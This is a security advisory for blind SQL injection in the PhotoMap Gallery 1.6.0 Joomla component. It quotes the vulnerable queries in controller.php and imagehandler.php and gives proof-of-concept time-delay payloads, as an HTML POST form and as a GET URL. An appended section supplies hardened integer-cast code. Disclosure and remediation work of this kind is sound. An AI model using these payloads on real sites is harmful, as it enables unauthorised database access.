PhotoMap Gallery 1.6.0 Joomla Component Multiple Blind SQL Injection

Name:              PhotoMap Gallery
Vendor:            http://extensions.joomla.org/extensions/photos-a-images/photo-gallery/10658
Versions Affected: 1.6.0
Author:            Salvatore Fresta aka Drosophila
Website:           http://www.salvatorefresta.net
Contact:           salvatorefresta [at] gmail [dot] com
Date:              2010-07-28

X. INDEX

I.   ABOUT THE APPLICATION
II.  DESCRIPTION
III. ANALYSIS
IV.  SAMPLE CODE
V.   FIX

I. ABOUT THE APPLICATION
________________________

PhotoMap Gallery is a gallery component completely integrated into Joomla 1.5.x. Like 'Picasa', 'Flickr', or 'Panoramio', you can easily add geo-tags to your photos so that you can remember exactly where they're from using Google Maps.

II. DESCRIPTION
_______________

Some parameters are not properly sanitised before being used in SQL queries.

III. ANALYSIS
_____________

Summary:

A) Multiple Blind SQL Injection
_______________________________

The parameter id passed to controller.php via POST when view is set to user and task is set to save_usercategory is not properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

The parameter folder passed to imagehandler.php is not properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

The following is the affected code.

controller.php (line 1135):

    function save_usercategory()
    {
        // Check for request forgeries
        JRequest::checkToken() or jexit( 'Invalid Token' );

        $user  = & JFactory::getUser();
        $task  = JRequest::getVar('task');
        $post  = JRequest::get('post');

        //perform access checks
        $isNew = ($post['id']) ? false : true;

        // $catid = (int) JRequest::getVar('catid', 0);

        $db =& JFactory::getDBO();
        $query = 'SELECT c.id, c.directory'
            . ' FROM #__g_categories AS c'
            . ' WHERE c.id = '.$post['id'];

imagehandler.php (line 109):

    function getList()
    {
        static $list;

        // Only process the list once per request
        if (is_array($list)) {
            return $list;
        }

        // Get folder from request
        $folder = $this->getState('folder');
        $search = $this->getState('search');

        $query = 'SELECT *'
            . ' FROM #__g_categories'
            . ' WHERE id = '.$folder;

IV. SAMPLE CODE
_______________

A) Multiple Blind SQL Injection

Replace 89eb36eca1919aff534b13b54796c9a4 with your own.

    <html>
    <head>
    <title>PoC - PhotoMap Gallery 1.6.0 Blind SQL Injection</title>
    </head>
    <body>
    <form method="POST" action="http://127.0.0.1/joomla/index.php">
    <input type="hidden" name="89eb36eca1919aff534b13b54796c9a4" value="1">
    <input type="hidden" name="option" value="com_photomapgallery">
    <input type="hidden" name="controller" value="">
    <input type="hidden" name="view" value="user">
    <input type="hidden" name="task" value="save_usercategory">
    <input type="hidden" name="id" value="-1 AND (SELECT(IF(0x41=0x41, BENCHMARK(99999999999,NULL),NULL)))">
    <input type="submit">
    </form>
    </body>
    </html>

    http://site/path/index.php?option=com_photomapgallery&view=imagehandler&folder=-1 OR (SELECT(IF(0x41=0x41,BENCHMARK(9999999999,NULL),NULL)))

V. FIX
______

No fix.
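Both query sites above concatenate a request-controlled value straight into a WHERE clause on a numeric key. The following is an added example of how those two sites would look hardened; it is not PhotoMap Gallery's code and not a vendor patch (the advisory records none). It assumes the Joomla 1.5.x framework helpers JRequest::checkToken(), JRequest::getInt(), JFactory::getDBO() and the setQuery()/loadObject()/loadObjectList() methods of the database object, plus the same table and variable names as the quoted excerpts.

```php
<?php
// Added example (not PhotoMap Gallery's code): hardened versions of the two
// query sites quoted in the advisory. Assumes Joomla 1.5.x APIs.

// controller.php, save_usercategory(): the category id is a numeric primary key,
// so read it as an integer. Any non-numeric payload collapses to 0 and the query
// string can only ever contain digits after "c.id = ".
function save_usercategory_hardened()
{
    // Check for request forgeries (unchanged from the original)
    JRequest::checkToken() or jexit('Invalid Token');

    // getInt() applies an integer filter on read; no raw $post['id'] reaches the query
    $id    = JRequest::getInt('id', 0);
    $isNew = ($id === 0);
    if ($isNew) {
        // Nothing to look up for a new category
        return null;
    }

    $db    = JFactory::getDBO();
    $query = 'SELECT c.id, c.directory'
        . ' FROM #__g_categories AS c'
        . ' WHERE c.id = ' . (int) $id;   // explicit cast at the point of use
    $db->setQuery($query);
    return $db->loadObject();
}

// imagehandler.php, getList(): the folder value is populated from the request into
// model state, so it gets the same treatment. $model stands for the model object
// whose getState() the original calls as $this (hypothetical parameter name).
function getList_hardened($model)
{
    $folder = (int) $model->getState('folder');
    if ($folder <= 0) {
        // Invalid or missing folder id: return an empty list instead of querying
        return array();
    }

    $db    = JFactory::getDBO();
    $query = 'SELECT *'
        . ' FROM #__g_categories'
        . ' WHERE id = ' . $folder;       // $folder is already an int here
    $db->setQuery($query);
    return $db->loadObjectList();
}
```

The integer cast is the right tool here because both columns are numeric ids; for string parameters the equivalent step is the database object's Quote() escaping or a prepared statement. A defender reviewing other Joomla 1.5 components can grep for `JRequest::getVar(` and `JRequest::get('post')` results that are concatenated into `$query` strings without a cast or Quote(), which is exactly the pattern in both excerpts.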